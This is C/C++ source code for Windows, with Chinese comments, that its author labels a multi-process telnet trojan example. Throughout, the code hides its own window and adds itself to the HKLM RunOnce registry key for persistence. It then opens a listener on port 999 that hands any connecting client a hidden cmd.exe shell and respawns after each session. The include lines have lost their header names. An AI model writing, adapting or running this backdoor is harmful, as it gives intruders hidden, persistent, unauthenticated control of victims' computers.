//vc6.0完全通过 一个多进程的telnet的木马例子
//ddxxkk
//在命令行下执行程序可以telnet 127.0.0.1 999
//以后开机后就运行
#include "stdafx.h"
#include
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")
#define buflen 20000
void shell(char *cmds);
void createhide(char *cmds);
u_int port;
long i;
int main(int argc, char *argv[])
{
int *ret;
_asm mov i,ebp
ret=(int*)i+1;
/*
//注册表的过程使用
HKEY hKEY;//定义有关的 hKEY, 在查询结束时要关闭
LPCTSTR data_Set="SOFTWARE\\Microsoft\\
Windows\\CurrentVersion\\RunOnce\\";
//打开与路径 data_Set 相关的 hKEY,第一个参数为根键名称,第二个参数表
//示要访问的键的位置,第三个参数必须为0,后面是查询的方式
//访问注册表,hKEY则保存此函数所打开的键的句柄
long ret0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
//如果无法打开hKEY,则终止程序的执行
if(ret0!=ERROR_SUCCESS) {printf("错误: 无法打开有关的hKEY!");return 0;}
//查询有关的数据 (用户姓名 username_Get)
LPBYTE username_Get=new BYTE[80];
DWORD type_1=REG_SZ ; DWORD cbData_1=80;
//hKEY为刚才RegOpenKeyEx()函数所打开的键的句柄,"DefName"表示要查
//询的键值名,type_1表示查询数据的类型,username_Get保存所查询的数据,
//cbData_1表示预设置的数据长度
long ret1=::RegQueryValueEx(hKEY,"mytest", NULL,&type_1, username_Get,&cbData_1);
if(ret1!=ERROR_SUCCESS)
{
//如果名字不存在添加新的变量
unsigned char *username_Set;
DWORD setsize;
//char *tt=argv[0];
username_Set=(unsigned char *)argv[0];
setsize=strlen(argv[0])+1;
//与RegQureyValueEx()类似, hKEY表示已打开的键的句柄,"DefName"表示要访问的键值名,username_Set 表示新的键值,type_1和setsize表示新值的数据类型和数据长度
long ret9=::RegSetValueEx(hKEY,"mytest", NULL, type_1, username_Set, setsize);
if(ret9!=ERROR_SUCCESS) { printf("错误: 无法修改有关注册表信息!"); return 0; }
}
/*
unsigned char *username_Set;
DWORD setsize;
char *tt=argv[0];
username_Set=(unsigned char *)tt;
setsize=strlen(tt)+1;
//与RegQureyValueEx()类似, hKEY表示已打开的键的句柄,"DefName"表示要访问的键值名,username_Set 表示新的键值,type_1和cbData_1表示新值的数据类型和数据长度
//如果名字不存在添加新的变量
//long ret2=::RegSetValueEx(hKEY,"DefName", NULL, type_1, username_Set, cbData_1);
long ret9=::RegSetValueEx(hKEY,"mytest", NULL, type_1, username_Set, setsize);
//删除变量
//long ret4=RegDeleteValue(hKEY,"xxName");
//建立新节点
//DWORD dw;
//HKEY m_hKey;
//long ret9=::RegCreateKeyEx(hKEY,"myname",0L,NULL,REG_OPTION_VOLATILE,KEY_ALL_ACCESS,NULL,&m_hKey,&dw);
//
if(ret9!=ERROR_SUCCESS)
{
printf("错误: 无法修改有关注册表信息!");
return 0;
}
*/
/*
delete[] username_Get;
// 程序结束前要关闭已经打开的 hKEY
::RegCloseKey(hKEY);
// return 0;
*/
//ret-->return address
if (_fileno(stdout)>-1) { //当前有标准输入建立新进程
//建立一个新的没有窗口的进程
createhide(argv[0]);
return 0;
}
//在注册表中添加起动运行
HKEY hKEY;
LPCTSTR data_Set="SOFTWARE\\Microsoft\\
Windows\\CurrentVersion\\RunOnce\\";
long ret0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
if(ret0!=ERROR_SUCCESS) {printf("错误: 无法打开有关的hKEY!");return 0;}
LPBYTE username_Get=new BYTE[80];
DWORD type_1=REG_SZ ; DWORD cbData_1=80;
long ret1=::RegQueryValueEx(hKEY,"mytest", NULL,&type_1, username_Get,&cbData_1);
if(ret1!=ERROR_SUCCESS)
{
unsigned char *username_Set;
DWORD setsize;
username_Set=(unsigned char *)argv[0];
setsize=strlen(argv[0])+1;
//与RegQureyValueEx()类似, hKEY表示已打开的键的句柄,"DefName"表示要访问的键值名,username_Set 表示新的键值,type_1和setsize表示新值的数据类型和数据长度
long ret9=::RegSetValueEx(hKEY,"mytest", NULL, type_1, username_Set, setsize);
if(ret9!=ERROR_SUCCESS) { printf("错误: 无法修改有关注册表信息!"); return 0; }
}
delete[] username_Get;
::RegCloseKey(hKEY);
WSAData wsa;
if(WSAStartup(MAKEWORD(2,0),&wsa))
{puts(" Error to start up winsock!");return 0;}
shell(argv[0]);
WSACleanup();
return 0;
}
void shell(char *cmds)
{
SOCKET lsts,cons;
lsts=socket(AF_INET, SOCK_STREAM, 0);
if(lsts==INVALID_SOCKET)
{puts(" Create socket error!");return;}
int val=1;
char buff[100], data[buflen];
hostent *host;
u_long ip;
sockaddr_in locsin;
setsockopt(lsts, SOL_SOCKET, SO_REUSEADDR, (char*)&val, sizeof(val));
gethostname(buff,80);
host=gethostbyname(buff);
if(host==0)
{puts(" Get host error!");return;}
memcpy(&ip, host->h_addr_list[0], host->h_length);
memset(&locsin,0,sizeof(locsin));
locsin.sin_addr.s_addr=INADDR_ANY;
locsin.sin_family = AF_INET;
//locsin.sin_port = htons(port);
locsin.sin_port = htons(999);
bind(lsts, (sockaddr*)&locsin, sizeof(locsin));
listen(lsts,3);
int links=0;
val=sizeof(locsin);
cons=accept(lsts, (sockaddr*)&locsin,&val);
if(cons==INVALID_SOCKET)
{
val=(int)GetLastError();
printf(" accept error, error code:’%d’ !",val);
return;
}
HANDLE rp1, wp1, rp2, wp2;
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = 0;
sa.bInheritHandle = 1;
CreatePipe(&rp1, &wp1, &sa, 0);
CreatePipe(&rp2, &wp2, &sa, 0);
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si,0,sizeof(si));
si.hStdError = si.hStdOutput = wp1;
si.hStdInput = rp2;
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.lpReserved=0;
si.lpReserved2=0;
si.cbReserved2 =0;
si.cb = sizeof(si);
if(!CreateProcess(0, "cmd.exe", 0, 0, 1,0, 0, 0, &si, &pi))
{
val=(int)GetLastError();
return;
}
CloseHandle(rp2);CloseHandle(wp1);
Sleep(200);
u_long num, use;
while(1)
{
while(1)//bytes in pipe
{
if(!PeekNamedPipe(rp1, data, buflen, &num, &use, 0))
{num=0xffffffff;break;}//return TURE is OK
if(use && !ReadFile(rp1, data, use, &num, 0))
{num=0xffffffff;break;}//return 0 if error, close
if(num)send(cons, data, num, 0);
Sleep(100);
if(!use)break;
}
if(num==0xffffffff)break;
val=recv(cons, data, buflen ,0);
if(val==0||val==SOCKET_ERROR)
{
//puts(" Write to client error!");
break;}
WriteFile(wp2, data, val, &num, 0);
Sleep(100);
}
CloseHandle(rp1);CloseHandle(wp2);
closesocket(cons);
closesocket(lsts);
//当前进程结束新进程开始
createhide(cmds);
return;
}
void createhide (char *cmds)
{
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = 0;
sa.bInheritHandle = 1;
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si,0,sizeof(si));
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
//si.wShowWindow=SW_SHOWDEFAULT;
si.lpReserved=0;
si.lpReserved2=0;
si.cbReserved2 =0;
si.cb = sizeof(si);
CreateProcess(0,cmds, 0, 0, 1,CREATE_NEW_CONSOLE, 0, 0,&si,&pi);
return;
}